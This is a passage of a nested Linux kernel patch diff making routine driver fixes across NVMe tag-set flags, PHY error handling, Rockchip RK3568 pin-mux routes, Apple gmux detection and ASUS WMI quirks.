+ 	nvme_free_queues(dev, 0);
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index a55d3e8b607d5..6f918e61b6aef 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -798,7 +798,7 @@ static int nvme_rdma_alloc_tag_set(struct nvme_ctrl *ctrl)
+ 			    NVME_RDMA_METADATA_SGL_SIZE;
+ 
+ 	return nvme_alloc_io_tag_set(ctrl, &to_rdma_ctrl(ctrl)->tag_set,
+-			&nvme_rdma_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			&nvme_rdma_mq_ops,
+ 			ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
+ 			cmd_size);
+ }
+@@ -848,7 +848,6 @@ static int nvme_rdma_configure_admin_queue(struct nvme_rdma_ctrl *ctrl,
+ 	if (new) {
+ 		error = nvme_alloc_admin_tag_set(&ctrl->ctrl,
+ 				&ctrl->admin_tag_set, &nvme_rdma_admin_mq_ops,
+-				BLK_MQ_F_NO_SCHED,
+ 				sizeof(struct nvme_rdma_request) +
+ 				NVME_RDMA_DATA_SGL_SIZE);
+ 		if (error)
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 83735c52d34a0..eacd445b5333f 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1867,7 +1867,6 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 	if (new) {
+ 		ret = nvme_alloc_io_tag_set(ctrl, &to_tcp_ctrl(ctrl)->tag_set,
+ 				&nvme_tcp_mq_ops,
+-				BLK_MQ_F_SHOULD_MERGE | BLK_MQ_F_BLOCKING,
+ 				ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
+ 				sizeof(struct nvme_tcp_request));
+ 		if (ret)
+@@ -1943,7 +1942,7 @@ static int nvme_tcp_configure_admin_queue(struct nvme_ctrl *ctrl, bool new)
+ 	if (new) {
+ 		error = nvme_alloc_admin_tag_set(ctrl,
+ 				&to_tcp_ctrl(ctrl)->admin_tag_set,
+-				&nvme_tcp_admin_mq_ops, BLK_MQ_F_BLOCKING,
++				&nvme_tcp_admin_mq_ops,
+ 				sizeof(struct nvme_tcp_request));
+ 		if (error)
+ 			goto out_free_queue;
+@@ -2524,7 +2523,7 @@ static const struct blk_mq_ops nvme_tcp_admin_mq_ops = {
+ static const struct nvme_ctrl_ops nvme_tcp_ctrl_ops = {
+ 	.name			= "tcp",
+ 	.module			= THIS_MODULE,
+-	.flags			= NVME_F_FABRICS,
++	.flags			= NVME_F_FABRICS | NVME_F_BLOCKING,
+ 	.reg_read32		= nvmf_reg_read32,
+ 	.reg_read64		= nvmf_reg_read64,
+ 	.reg_write32		= nvmf_reg_write32,
+diff --git a/drivers/nvme/target/loop.c b/drivers/nvme/target/loop.c
+index 08c583258e90f..c864e902e91e2 100644
+--- a/drivers/nvme/target/loop.c
++++ b/drivers/nvme/target/loop.c
+@@ -353,7 +353,7 @@ static int nvme_loop_configure_admin_queue(struct nvme_loop_ctrl *ctrl)
+ 	ctrl->ctrl.queue_count = 1;
+ 
+ 	error = nvme_alloc_admin_tag_set(&ctrl->ctrl, &ctrl->admin_tag_set,
+-			&nvme_loop_admin_mq_ops, BLK_MQ_F_NO_SCHED,
++			&nvme_loop_admin_mq_ops,
+ 			sizeof(struct nvme_loop_iod) +
+ 			NVME_INLINE_SG_CNT * sizeof(struct scatterlist));
+ 	if (error)
+@@ -494,7 +494,7 @@ static int nvme_loop_create_io_queues(struct nvme_loop_ctrl *ctrl)
+ 		return ret;
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_loop_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
++			&nvme_loop_mq_ops, 1,
+ 			sizeof(struct nvme_loop_iod) +
+ 			NVME_INLINE_SG_CNT * sizeof(struct scatterlist));
+ 	if (ret)
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index b80a9b74662b1..1deb61b22bc76 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -1576,7 +1576,6 @@ static int arm_cmn_event_init(struct perf_event *event)
+ 			hw->dn++;
+ 			continue;
+ 		}
+-		hw->dtcs_used |= arm_cmn_node_to_xp(cmn, dn)->dtc;
+ 		hw->num_dns++;
+ 		if (bynodeid)
+ 			break;
+@@ -1589,6 +1588,12 @@ static int arm_cmn_event_init(struct perf_event *event)
+ 			nodeid, nid.x, nid.y, nid.port, nid.dev, type);
+ 		return -EINVAL;
+ 	}
++	/*
++	 * Keep assuming non-cycles events count in all DTC domains; turns out
++	 * it's hard to make a worthwhile optimisation around this, short of
++	 * going all-in with domain-local counter allocation as well.
++	 */
++	hw->dtcs_used = (1U << cmn->num_dtcs) - 1;
+ 
+ 	return arm_cmn_validate_group(cmn, event);
+ }
+diff --git a/drivers/phy/phy-can-transceiver.c b/drivers/phy/phy-can-transceiver.c
+index 95c6dbb52da72..ce511ad5d3690 100644
+--- a/drivers/phy/phy-can-transceiver.c
++++ b/drivers/phy/phy-can-transceiver.c
+@@ -99,6 +99,7 @@ static int can_transceiver_phy_probe(struct platform_device *pdev)
+ 	struct gpio_desc *standby_gpio;
+ 	struct gpio_desc *enable_gpio;
+ 	u32 max_bitrate = 0;
++	int err;
+ 
+ 	can_transceiver_phy = devm_kzalloc(dev, sizeof(struct can_transceiver_phy), GFP_KERNEL);
+ 	if (!can_transceiver_phy)
+@@ -124,8 +125,8 @@ static int can_transceiver_phy_probe(struct platform_device *pdev)
+ 		return PTR_ERR(phy);
+ 	}
+ 
+-	device_property_read_u32(dev, "max-bitrate", &max_bitrate);
+-	if (!max_bitrate)
++	err = device_property_read_u32(dev, "max-bitrate", &max_bitrate);
++	if ((err != -EINVAL) && !max_bitrate)
+ 		dev_warn(dev, "Invalid value for transceiver max bitrate. Ignoring bitrate limit\n");
+ 	phy->attrs.max_link_rate = max_bitrate;
+ 
+diff --git a/drivers/phy/rockchip/phy-rockchip-inno-usb2.c b/drivers/phy/rockchip/phy-rockchip-inno-usb2.c
+index e6ededc515239..a0bc10aa79618 100644
+--- a/drivers/phy/rockchip/phy-rockchip-inno-usb2.c
++++ b/drivers/phy/rockchip/phy-rockchip-inno-usb2.c
+@@ -485,8 +485,10 @@ static int rockchip_usb2phy_power_on(struct phy *phy)
+ 		return ret;
+ 
+ 	ret = property_enable(base, &rport->port_cfg->phy_sus, false);
+-	if (ret)
++	if (ret) {
++		clk_disable_unprepare(rphy->clk480m);
+ 		return ret;
++	}
+ 
+ 	/* waiting for the utmi_clk to become stable */
+ 	usleep_range(1500, 2000);
+diff --git a/drivers/phy/sunplus/phy-sunplus-usb2.c b/drivers/phy/sunplus/phy-sunplus-usb2.c
+index e827b79f6d493..56de41091d639 100644
+--- a/drivers/phy/sunplus/phy-sunplus-usb2.c
++++ b/drivers/phy/sunplus/phy-sunplus-usb2.c
+@@ -254,6 +254,9 @@ static int sp_usb_phy_probe(struct platform_device *pdev)
+ 		return PTR_ERR(usbphy->phy_regs);
+ 
+ 	usbphy->moon4_res_mem = platform_get_resource_byname(pdev, IORESOURCE_MEM, "moon4");
++	if (!usbphy->moon4_res_mem)
++		return -EINVAL;
++
+ 	usbphy->moon4_regs = devm_ioremap(&pdev->dev, usbphy->moon4_res_mem->start,
+ 					  resource_size(usbphy->moon4_res_mem));
+ 	if (!usbphy->moon4_regs)
+diff --git a/drivers/phy/ti/Kconfig b/drivers/phy/ti/Kconfig
+index 15a3bcf323086..b905902d57508 100644
+--- a/drivers/phy/ti/Kconfig
++++ b/drivers/phy/ti/Kconfig
+@@ -23,7 +23,7 @@ config PHY_DM816X_USB
+ 
+ config PHY_AM654_SERDES
+ 	tristate "TI AM654 SERDES support"
+-	depends on OF && ARCH_K3 || COMPILE_TEST
++	depends on OF && (ARCH_K3 || COMPILE_TEST)
+ 	depends on COMMON_CLK
+ 	select GENERIC_PHY
+ 	select MULTIPLEXER
+@@ -35,7 +35,7 @@ config PHY_AM654_SERDES
+ 
+ config PHY_J721E_WIZ
+ 	tristate "TI J721E WIZ (SERDES Wrapper) support"
+-	depends on OF && ARCH_K3 || COMPILE_TEST
++	depends on OF && (ARCH_K3 || COMPILE_TEST)
+ 	depends on HAS_IOMEM && OF_ADDRESS
+ 	depends on COMMON_CLK
+ 	select GENERIC_PHY
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index da974ff2d75d0..5eeac92f610a0 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -926,19 +926,19 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_PMU(0, RK_PB5, 4, 0x0110, WRITE_MASK_VAL(3, 2, 1)), /* PWM1 IO mux M1 */
+ 	RK_MUXROUTE_PMU(0, RK_PC1, 1, 0x0110, WRITE_MASK_VAL(5, 4, 0)), /* PWM2 IO mux M0 */
+ 	RK_MUXROUTE_PMU(0, RK_PB6, 4, 0x0110, WRITE_MASK_VAL(5, 4, 1)), /* PWM2 IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PB3, 2, 0x0300, WRITE_MASK_VAL(0, 0, 0)), /* CAN0 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PB3, 2, 0x0300, WRITE_MASK_VAL(0, 0, 0)), /* CAN0 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PA1, 4, 0x0300, WRITE_MASK_VAL(0, 0, 1)), /* CAN0 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA1, 3, 0x0300, WRITE_MASK_VAL(2, 2, 0)), /* CAN1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PC3, 3, 0x0300, WRITE_MASK_VAL(2, 2, 1)), /* CAN1 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PB5, 3, 0x0300, WRITE_MASK_VAL(4, 4, 0)), /* CAN2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PB2, 4, 0x0300, WRITE_MASK_VAL(4, 4, 1)), /* CAN2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PC4, 1, 0x0300, WRITE_MASK_VAL(6, 6, 0)), /* HPDIN IO mux M0 */
+-	RK_MUXROUTE_PMU(0, RK_PC2, 2, 0x0300, WRITE_MASK_VAL(6, 6, 1)), /* HPDIN IO mux M1 */
++	RK_MUXROUTE_GRF(0, RK_PC2, 2, 0x0300, WRITE_MASK_VAL(6, 6, 1)), /* HPDIN IO mux M1 */
+ 	RK_MUXROUTE_GRF(3, RK_PB1, 3, 0x0300, WRITE_MASK_VAL(8, 8, 0)), /* GMAC1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PA7, 3, 0x0300, WRITE_MASK_VAL(8, 8, 1)), /* GMAC1 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PD1, 1, 0x0300, WRITE_MASK_VAL(10, 10, 0)), /* HDMITX IO mux M0 */
+-	RK_MUXROUTE_PMU(0, RK_PC7, 1, 0x0300, WRITE_MASK_VAL(10, 10, 1)), /* HDMITX IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PB6, 1, 0x0300, WRITE_MASK_VAL(14, 14, 0)), /* I2C2 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PC7, 1, 0x0300, WRITE_MASK_VAL(10, 10, 1)), /* HDMITX IO mux M1 */
++	RK_MUXROUTE_GRF(0, RK_PB6, 1, 0x0300, WRITE_MASK_VAL(14, 14, 0)), /* I2C2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PB4, 1, 0x0300, WRITE_MASK_VAL(14, 14, 1)), /* I2C2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA0, 1, 0x0304, WRITE_MASK_VAL(0, 0, 0)), /* I2C3 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PB6, 4, 0x0304, WRITE_MASK_VAL(0, 0, 1)), /* I2C3 IO mux M1 */
+@@ -964,7 +964,7 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_GRF(4, RK_PC3, 1, 0x0308, WRITE_MASK_VAL(12, 12, 1)), /* PWM15 IO mux M1 */
+ 	RK_MUXROUTE_GRF(3, RK_PD2, 3, 0x0308, WRITE_MASK_VAL(14, 14, 0)), /* SDMMC2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PA5, 5, 0x0308, WRITE_MASK_VAL(14, 14, 1)), /* SDMMC2 IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PB5, 2, 0x030c, WRITE_MASK_VAL(0, 0, 0)), /* SPI0 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PB5, 2, 0x030c, WRITE_MASK_VAL(0, 0, 0)), /* SPI0 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD3, 3, 0x030c, WRITE_MASK_VAL(0, 0, 1)), /* SPI0 IO mux M1 */
+ 	RK_MUXROUTE_GRF(2, RK_PB5, 3, 0x030c, WRITE_MASK_VAL(2, 2, 0)), /* SPI1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PC3, 3, 0x030c, WRITE_MASK_VAL(2, 2, 1)), /* SPI1 IO mux M1 */
+@@ -973,8 +973,8 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_GRF(4, RK_PB3, 4, 0x030c, WRITE_MASK_VAL(6, 6, 0)), /* SPI3 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PC2, 2, 0x030c, WRITE_MASK_VAL(6, 6, 1)), /* SPI3 IO mux M1 */
+ 	RK_MUXROUTE_GRF(2, RK_PB4, 2, 0x030c, WRITE_MASK_VAL(8, 8, 0)), /* UART1 IO mux M0 */
+-	RK_MUXROUTE_PMU(0, RK_PD1, 1, 0x030c, WRITE_MASK_VAL(8, 8, 1)), /* UART1 IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PD1, 1, 0x030c, WRITE_MASK_VAL(10, 10, 0)), /* UART2 IO mux M0 */
++	RK_MUXROUTE_GRF(3, RK_PD6, 4, 0x030c, WRITE_MASK_VAL(8, 8, 1)), /* UART1 IO mux M1 */
++	RK_MUXROUTE_GRF(0, RK_PD1, 1, 0x030c, WRITE_MASK_VAL(10, 10, 0)), /* UART2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(1, RK_PD5, 2, 0x030c, WRITE_MASK_VAL(10, 10, 1)), /* UART2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA1, 2, 0x030c, WRITE_MASK_VAL(12, 12, 0)), /* UART3 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PB7, 4, 0x030c, WRITE_MASK_VAL(12, 12, 1)), /* UART3 IO mux M1 */
+@@ -1004,13 +1004,13 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_GRF(3, RK_PD6, 5, 0x0314, WRITE_MASK_VAL(1, 0, 1)), /* PDM IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PA0, 4, 0x0314, WRITE_MASK_VAL(1, 0, 1)), /* PDM IO mux M1 */
+ 	RK_MUXROUTE_GRF(3, RK_PC4, 5, 0x0314, WRITE_MASK_VAL(1, 0, 2)), /* PDM IO mux M2 */
+-	RK_MUXROUTE_PMU(0, RK_PA5, 3, 0x0314, WRITE_MASK_VAL(3, 2, 0)), /* PCIE20 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PA5, 3, 0x0314, WRITE_MASK_VAL(3, 2, 0)), /* PCIE20 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD0, 4, 0x0314, WRITE_MASK_VAL(3, 2, 1)), /* PCIE20 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PB0, 4, 0x0314, WRITE_MASK_VAL(3, 2, 2)), /* PCIE20 IO mux M2 */
+-	RK_MUXROUTE_PMU(0, RK_PA4, 3, 0x0314, WRITE_MASK_VAL(5, 4, 0)), /* PCIE30X1 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PA4, 3, 0x0314, WRITE_MASK_VAL(5, 4, 0)), /* PCIE30X1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD2, 4, 0x0314, WRITE_MASK_VAL(5, 4, 1)), /* PCIE30X1 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA5, 4, 0x0314, WRITE_MASK_VAL(5, 4, 2)), /* PCIE30X1 IO mux M2 */
+-	RK_MUXROUTE_PMU(0, RK_PA6, 2, 0x0314, WRITE_MASK_VAL(7, 6, 0)), /* PCIE30X2 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PA6, 2, 0x0314, WRITE_MASK_VAL(7, 6, 0)), /* PCIE30X2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD4, 4, 0x0314, WRITE_MASK_VAL(7, 6, 1)), /* PCIE30X2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PC2, 4, 0x0314, WRITE_MASK_VAL(7, 6, 2)), /* PCIE30X2 IO mux M2 */
+ };
+@@ -2436,10 +2436,19 @@ static int rockchip_get_pull(struct rockchip_pin_bank *bank, int pin_num)
+ 	case RK3308:
+ 	case RK3368:
+ 	case RK3399:
++	case RK3568:
+ 	case RK3588:
+ 		pull_type = bank->pull_type[pin_num / 8];
+ 		data >>= bit;
+ 		data &= (1 << RK3188_PULL_BITS_PER_PIN) - 1;
++		/*
++		 * In the TRM, pull-up being 1 for everything except the GPIO0_D3-D6,
++		 * where that pull up value becomes 3.
++		 */
++		if (ctrl->type == RK3568 && bank->bank_num == 0 && pin_num >= 27 && pin_num <= 30) {
++			if (data == 3)
++				data = 1;
++		}
+ 
+ 		return rockchip_pull_list[pull_type][data];
+ 	default:
+@@ -2497,7 +2506,7 @@ static int rockchip_set_pull(struct rockchip_pin_bank *bank,
+ 			}
+ 		}
+ 		/*
+-		 * In the TRM, pull-up being 1 for everything except the GPIO0_D0-D6,
++		 * In the TRM, pull-up being 1 for everything except the GPIO0_D3-D6,
+ 		 * where that pull up value becomes 3.
+ 		 */
+ 		if (ctrl->type == RK3568 && bank->bank_num == 0 && pin_num >= 27 && pin_num <= 30) {
+diff --git a/drivers/platform/x86/apple-gmux.c b/drivers/platform/x86/apple-gmux.c
+index ca33df7ea550e..9333f82cfa8a0 100644
+--- a/drivers/platform/x86/apple-gmux.c
++++ b/drivers/platform/x86/apple-gmux.c
+@@ -64,29 +64,6 @@ struct apple_gmux_data {
+ 
+ static struct apple_gmux_data *apple_gmux_data;
+ 
+-/*
+- * gmux port offsets. Many of these are not yet used, but may be in the
+- * future, and it's useful to have them documented here anyhow.
+- */
+-#define GMUX_PORT_VERSION_MAJOR		0x04
+-#define GMUX_PORT_VERSION_MINOR		0x05
+-#define GMUX_PORT_VERSION_RELEASE	0x06
+-#define GMUX_PORT_SWITCH_DISPLAY	0x10
+-#define GMUX_PORT_SWITCH_GET_DISPLAY	0x11
+-#define GMUX_PORT_INTERRUPT_ENABLE	0x14
+-#define GMUX_PORT_INTERRUPT_STATUS	0x16
+-#define GMUX_PORT_SWITCH_DDC		0x28
+-#define GMUX_PORT_SWITCH_EXTERNAL	0x40
+-#define GMUX_PORT_SWITCH_GET_EXTERNAL	0x41
+-#define GMUX_PORT_DISCRETE_POWER	0x50
+-#define GMUX_PORT_MAX_BRIGHTNESS	0x70
+-#define GMUX_PORT_BRIGHTNESS		0x74
+-#define GMUX_PORT_VALUE			0xc2
+-#define GMUX_PORT_READ			0xd0
+-#define GMUX_PORT_WRITE			0xd4
+-
+-#define GMUX_MIN_IO_LEN			(GMUX_PORT_BRIGHTNESS + 4)
+-
+ #define GMUX_INTERRUPT_ENABLE		0xff
+ #define GMUX_INTERRUPT_DISABLE		0x00
+ 
+@@ -249,23 +226,6 @@ static void gmux_write32(struct apple_gmux_data *gmux_data, int port,
+ 		gmux_pio_write32(gmux_data, port, val);
+ }
+ 
+-static bool gmux_is_indexed(struct apple_gmux_data *gmux_data)
+-{
+-	u16 val;
+-
+-	outb(0xaa, gmux_data->iostart + 0xcc);
+-	outb(0x55, gmux_data->iostart + 0xcd);
+-	outb(0x00, gmux_data->iostart + 0xce);
+-
+-	val = inb(gmux_data->iostart + 0xcc) |
+-		(inb(gmux_data->iostart + 0xcd) << 8);
+-
+-	if (val == 0x55aa)
+-		return true;
+-
+-	return false;
+-}
+-
+ /**
+  * DOC: Backlight control
+  *
+@@ -605,60 +565,43 @@ static int gmux_probe(struct pnp_dev *pnp, const struct pnp_device_id *id)
+ 	int ret = -ENXIO;
+ 	acpi_status status;
+ 	unsigned long long gpe;
++	bool indexed = false;
++	u32 version;
+ 
+ 	if (apple_gmux_data)
+ 		return -EBUSY;
+ 
++	if (!apple_gmux_detect(pnp, &indexed)) {
++		pr_info("gmux device not present\n");
++		return -ENODEV;
++	}
++
+ 	gmux_data = kzalloc(sizeof(*gmux_data), GFP_KERNEL);
+ 	if (!gmux_data)
+ 		return -ENOMEM;
+ 	pnp_set_drvdata(pnp, gmux_data);
+ 
+ 	res = pnp_get_resource(pnp, IORESOURCE_IO, 0);
+-	if (!res) {
+-		pr_err("Failed to find gmux I/O resource\n");
+-		goto err_free;
+-	}
+-
+ 	gmux_data->iostart = res->start;
+ 	gmux_data->iolen = resource_size(res);
+ 
+-	if (gmux_data->iolen < GMUX_MIN_IO_LEN) {
+-		pr_err("gmux I/O region too small (%lu < %u)\n",
+-		       gmux_data->iolen, GMUX_MIN_IO_LEN);
+-		goto err_free;
+-	}
+-
+ 	if (!request_region(gmux_data->iostart, gmux_data->iolen,
+ 			    "Apple gmux")) {
+ 		pr_err("gmux I/O already in use\n");
+ 		goto err_free;
+ 	}
+ 
+-	/*
+-	 * Invalid version information may indicate either that the gmux
+-	 * device isn't present or that it's a new one that uses indexed
+-	 * io
+-	 */
+-
+-	ver_major = gmux_read8(gmux_data, GMUX_PORT_VERSION_MAJOR);
+-	ver_minor = gmux_read8(gmux_data, GMUX_PORT_VERSION_MINOR);
+-	ver_release = gmux_read8(gmux_data, GMUX_PORT_VERSION_RELEASE);
+-	if (ver_major == 0xff && ver_minor == 0xff && ver_release == 0xff) {
+-		if (gmux_is_indexed(gmux_data)) {
+-			u32 version;
+-			mutex_init(&gmux_data->index_lock);
+-			gmux_data->indexed = true;
+-			version = gmux_read32(gmux_data,
+-				GMUX_PORT_VERSION_MAJOR);
+-			ver_major = (version >> 24) & 0xff;
+-			ver_minor = (version >> 16) & 0xff;
+-			ver_release = (version >> 8) & 0xff;
+-		} else {
+-			pr_info("gmux device not present\n");
+-			ret = -ENODEV;
+-			goto err_release;
+-		}
++	if (indexed) {
++		mutex_init(&gmux_data->index_lock);
++		gmux_data->indexed = true;
++		version = gmux_read32(gmux_data, GMUX_PORT_VERSION_MAJOR);
++		ver_major = (version >> 24) & 0xff;
++		ver_minor = (version >> 16) & 0xff;
++		ver_release = (version >> 8) & 0xff;
++	} else {
++		ver_major = gmux_read8(gmux_data, GMUX_PORT_VERSION_MAJOR);
++		ver_minor = gmux_read8(gmux_data, GMUX_PORT_VERSION_MINOR);
++		ver_release = gmux_read8(gmux_data, GMUX_PORT_VERSION_RELEASE);
+ 	}
+ 	pr_info("Found gmux version %d.%d.%d [%s]\n", ver_major, ver_minor,
+ 		ver_release, (gmux_data->indexed ? "indexed" : "classic"));
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index c685a705b73dd..cb15acdf14a30 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -121,6 +121,10 @@ static struct quirk_entry quirk_asus_tablet_mode = {
+ 	.tablet_switch_mode = asus_wmi_lid_flip_rog_devid,
+ };
+ 
++static struct quirk_entry quirk_asus_ignore_fan = {
++	.wmi_ignore_fan = true,
++};
++
+ static int dmi_matched(const struct dmi_system_id *dmi)
+ {
+ 	pr_info("Identified laptop model '%s'\n", dmi->ident);
+@@ -473,6 +477,15 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
++	{
++		.callback = dmi_matched,
++		.ident = "ASUS VivoBook E410MA",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "E410MA"),
++		},
++		.driver_data = &quirk_asus_ignore_fan,
++	},
+ 	{},
+ };
+ 
+@@ -511,6 +524,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0x30, { KEY_VOLUMEUP } },
+ 	{ KE_KEY, 0x31, { KEY_VOLUMEDOWN } },
+ 	{ KE_KEY, 0x32, { KEY_MUTE } },
++	{ KE_KEY, 0x33, { KEY_SCREENLOCK } },
+ 	{ KE_KEY, 0x35, { KEY_SCREENLOCK } },
+ 	{ KE_KEY, 0x38, { KEY_PROG3 } }, /* Armoury Crate */
+ 	{ KE_KEY, 0x40, { KEY_PREVIOUSSONG } },
+@@ -544,6 +558,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0x7D, { KEY_BLUETOOTH } }, /* Bluetooth Enable */
+ 	{ KE_KEY, 0x7E, { KEY_BLUETOOTH } }, /* Bluetooth Disable */
+ 	{ KE_KEY, 0x82, { KEY_CAMERA } },
++	{ KE_KEY, 0x85, { KEY_CAMERA } },
+ 	{ KE_KEY, 0x86, { KEY_PROG1 } }, /* MyASUS Key */
+ 	{ KE_KEY, 0x88, { KEY_RFKILL  } }, /* Radio Toggle Key */
+ 	{ KE_KEY, 0x8A, { KEY_PROG1 } }, /* Color enhancement mode */
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index f051b21653d61..02bf286924183 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -225,6 +225,7 @@ struct asus_wmi {
+ 
+ 	int tablet_switch_event_code;
+ 	u32 tablet_switch_dev_id;
++	bool tablet_switch_inverted;
+ 
+ 	enum fan_type fan_type;
+ 	enum fan_type gpu_fan_type;
+@@ -493,6 +494,13 @@ static bool asus_wmi_dev_is_present(struct asus_wmi *asus, u32 dev_id)
+ }
+ 
+ /* Input **********************************************************************/
++static void asus_wmi_tablet_sw_report(struct asus_wmi *asus, bool value)
++{
++	input_report_switch(asus->inputdev, SW_TABLET_MODE,
++			    asus->tablet_switch_inverted ? !value : value);
++	input_sync(asus->inputdev);
++}
++
+ static void asus_wmi_tablet_sw_init(struct asus_wmi *asus, u32 dev_id, int event_code)
+ {
+ 	struct device *dev = &asus->platform_device->dev;
+@@ -501,7 +509,7 @@ static void asus_wmi_tablet_sw_init(struct asus_wmi *asus, u32 dev_id, int event
+ 	result = asus_wmi_get_devstate_simple(asus, dev_id);
+ 	if (result >= 0) {
+ 		input_set_capability(asus->inputdev, EV_SW, SW_TABLET_MODE);
+-		input_report_switch(asus->inputdev, SW_TABLET_MODE, result);
++		asus_wmi_tablet_sw_report(asus, result);
+ 		asus->tablet_switch_dev_id = dev_id;
+ 		asus->tablet_switch_event_code = event_code;
+ 	} else if (result == -ENODEV) {
+@@ -534,6 +542,7 @@ static int asus_wmi_input_init(struct asus_wmi *asus)
+ 	case asus_wmi_no_tablet_switch:
+ 		break;
+ 	case asus_wmi_kbd_dock_devid:
++		asus->tablet_switch_inverted = true;
+ 		asus_wmi_tablet_sw_init(asus, ASUS_WMI_DEVID_KBD_DOCK, NOTIFY_KBD_DOCK_CHANGE);
+ 		break;
+ 	case asus_wmi_lid_flip_devid:
+@@ -573,10 +582,8 @@ static void asus_wmi_tablet_mode_get_state(struct asus_wmi *asus)
+ 		return;
+ 
+ 	result = asus_wmi_get_devstate_simple(asus, asus->tablet_switch_dev_id);
+-	if (result >= 0) {
+-		input_report_switch(asus->inputdev, SW_TABLET_MODE, result);
+-		input_sync(asus->inputdev);
+-	}
++	if (result >= 0)
++		asus_wmi_tablet_sw_report(asus, result);
+ }
+ 
+ /* dGPU ********************************************************************/
+@@ -2243,7 +2250,9 @@ static int asus_wmi_fan_init(struct asus_wmi *asus)
+ 	asus->fan_type = FAN_TYPE_NONE;
+ 	asus->agfn_pwm = -1;
+ 
+-	if (asus_wmi_dev_is_present(asus, ASUS_WMI_DEVID_CPU_FAN_CTRL))
++	if (asus->driver->quirks->wmi_ignore_fan)
++		asus->fan_type = FAN_TYPE_NONE;
++	else if (asus_wmi_dev_is_present(asus, ASUS_WMI_DEVID_CPU_FAN_CTRL))
+ 		asus->fan_type = FAN_TYPE_SPEC83;
+ 	else if (asus_wmi_has_agfn_fan(asus))
+ 		asus->fan_type = FAN_TYPE_AGFN;
+diff --git a/drivers/platform/x86/asus-wmi.h b/drivers/platform/x86/asus-wmi.h
+index 65316998b898a..a478ebfd34dfa 100644
+--- a/drivers/platform/x86/asus-wmi.h
++++ b/drivers/platform/x86/asus-wmi.h
+@@ -38,6 +38,7 @@ struct quirk_entry {
+ 	bool store_backlight_power;
+ 	bool wmi_backlight_set_devstate;
+ 	bool wmi_force_als_set;
++	bool wmi_ignore_fan;
+ 	enum asus_wmi_tablet_switch_mode tablet_switch_mode;
+ 	int wapf;
+ 	/*
